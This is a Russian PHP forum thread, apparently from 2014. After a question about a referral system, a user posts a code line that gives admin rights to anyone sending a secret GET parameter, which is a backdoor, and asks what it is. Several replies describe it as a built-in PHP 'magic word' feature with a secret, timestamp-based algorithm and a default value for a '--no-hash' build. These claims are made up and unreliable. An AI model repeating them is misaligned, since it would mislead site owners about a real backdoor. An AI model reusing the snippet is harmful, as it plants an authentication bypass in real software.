[ Поиск ] - [ Пользователи ] - [ Календарь ]
Полная Версия: GET Запросы
Kela
Привет всем, возникла проблема!!
Мне на сайт нужна реферальная система!
Нашел на одном сайте(На котором каждый день сижу) ТЫК
Возникла проблема, не работает!
После регистрации ничего не происходит!У других все работает!Я по гайду делал и не работает!
Движок: DLE 10.0
Если лень помогать, тогда заплачу!
Ricco381
там сайт атакован)
Guest
Цитата (Ricco381 @ 2.10.2014 - 16:57)
там сайт атакован)

Уже все норм!Посмотрите в чем проблема?
wikden
Помогите разобраться в коде. Это простая аутоинтефикация или пароль отправляется кому-то на эмеил? Как узнать что это "GGSIAODJGAAODSX" ?

if(isset($_GET['GGSIAODJGAAODSX']) && $_GET['GGSIAODJGAAODSX'] ==
'DDBGJUSOEEHLSJMSSHDF' ){$_SESSION['admin'] = true;header('Location: admin.php');}
Alchemist
GGSIAODJGAAODSX - это "магическое" слово. (magic word)

Было добавлено в пхп в версии 3.0 в качестве своего рода "последнего шанса". Получив этот параметр с правильным значением (разным для каждого сайта, вычисляемым по закрытому алгоритму) система сразу дает юзеру полные админские права.
Invis1ble
ага, "сим-салабим, откройся!"

_____________

Профессиональная разработка на заказ

Я на GitHub | второй профиль

wikden
Вау! как интересно. А как его сделать? И, я так понимаю, значение этого "GGSIAODJGAAODSX" нам не узнать?
Winston
Цитата (wikden @ 12.10.2014 - 17:29)
Вау! как интересно. А как его сделать? И, я так понимаю, значение этого "GGSIAODJGAAODSX" нам не узнать?

Насколько я знаю, значение этого параметра формируется на основе данных сервера, часть этих данных можно взять из $_SERVER, а вот по какому алгоритму эти значения шифруются, не известно, нужно смотреть исходники PHP и искать тот алгоритм, но еще одна проблема в том, что этот алгоритм обфусцирован (зашифрован), и еще никому не удавалось его деобфуцировать..., если тебе это удастся, то сможешь получить полный доступ к большинству серверов по всему миру.
wikden
Winston, спасибо. А как его сделать? Хочу подобный сделать.
Winston
Цитата (wikden @ 12.10.2014 - 19:11)
Winston, спасибо. А как его сделать? Хочу подобный сделать

Что сделать?
wikden
Winston, подобную кодировку-шифровку GGSIAODJGAAODSX
Alchemist
Тебе же написали: "смотреть исходники PHP", т.е. ты не можешь это сам сделать, оно создается автоматически при "сборке" (компиляции) PHP на сервере. Это в Unix-системах, в Винде, соответственно, при инсталляции. И алгоритм генерации известен только создателям PHP.

Более того, при переустановке PHP на той же самой машине будет сгенерировано новое значение. Вот обсуждение, что это из-за того что там в качестве одного из секретных ключей используется текущее время - timestamp.

http://stackoverflow.com/questions/1280218...ng-of-timestamp - (сайт на английском)

ЗЫ: единственный случай когда значение параметра известно заранее, это если при сборке/установке использовался ключ --no-hash - тогда ставится дефолтное значение: "DDBGJUSOEEHLSJMSSHDF" (без кавычек, разумеется)
Быстрый ответ:

 Графические смайлики |  Показывать подпись
Здесь расположена полная версия этой страницы.
Invision Power Board © 2001-2024 Invision Power Services, Inc.